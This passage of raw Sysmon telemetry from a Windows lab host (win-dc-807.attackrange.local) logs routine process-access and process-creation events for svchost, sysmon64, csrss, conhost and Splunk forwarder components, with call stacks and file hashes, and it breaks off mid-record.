15:57:11.187{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006883Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.187{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006882Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.187{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006881Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.187{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7DD7-5FA1-7F01-000000008801}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006880Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.187{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7DD7-5FA1-7F01-000000008801}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006879Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:11.188{D28789B6-7DD7-5FA1-7F01-000000008801}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006918Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:12.453{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7DD8-5FA1-8101-000000008801}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006917Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:12.453{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006916Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:12.453{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006915Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:12.453{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006914Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:12.453{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006913Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:12.453{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006912Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:12.453{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006911Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:12.453{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006910Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:12.453{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006909Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:12.453{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006908Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:12.453{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7DD8-5FA1-8101-000000008801}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006907Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:12.453{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7DD8-5FA1-8101-000000008801}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006906Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:12.454{D28789B6-7DD8-5FA1-8101-000000008801}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006932Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:13.906{D28789B6-7DD9-5FA1-8201-000000008801}25084424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006931Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:13.781{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7DD9-5FA1-8201-000000008801}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006930Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:13.781{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006929Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:13.781{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006928Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:13.781{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006927Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:13.781{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006926Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:13.781{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006925Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:13.781{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL